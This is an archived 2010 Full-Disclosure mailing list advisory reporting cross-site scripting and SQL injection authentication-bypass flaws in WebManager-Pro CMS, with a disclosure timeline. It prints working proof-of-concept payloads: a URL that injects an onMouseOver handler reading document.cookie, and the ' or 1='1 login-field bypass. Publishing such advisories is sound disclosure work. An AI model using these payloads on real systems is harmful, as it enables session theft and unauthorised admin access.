[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] XSS and SQL Injection vulnerabilities in CMS
From: "MustLive" <mustlive () websecurity ! com ! ua>
Date: 2010-10-30 17:44:46
Message-ID: 002d01cb785a$32578f60$c103fea9 () ml
[Download RAW message or body]
Hello Full-Disclosure!
I want to warn you about Cross-Site Scripting and SQL Injection
vulnerabilities in CMS WebManager-Pro. It's Ukrainian commercial CMS.
-------------------------
Affected products:
-------------------------
Vulnerable are CMS WebManager-Pro v.7.4.3 (version from FGS_Studio) and
previous versions.
----------
Details:
----------
XSS (WASC-08):
http://site/index.php?word[]=%22%20onMouseOver=alert(document.cookie)%20
This vulnerability can be used together with MouseOverJacking
(http://websecurity.com.ua/3814/).
SQL Injection (Authentication Bypass) (WASC-19):
At the page http://site/admin/ at turned off mq:
' or 1='1
In field Login.
------------
Timeline:
------------
2010.07.28 - announced at my site.
2010.07.29 - informed developers.
2010.10.30 - disclosed at my site.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4414/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic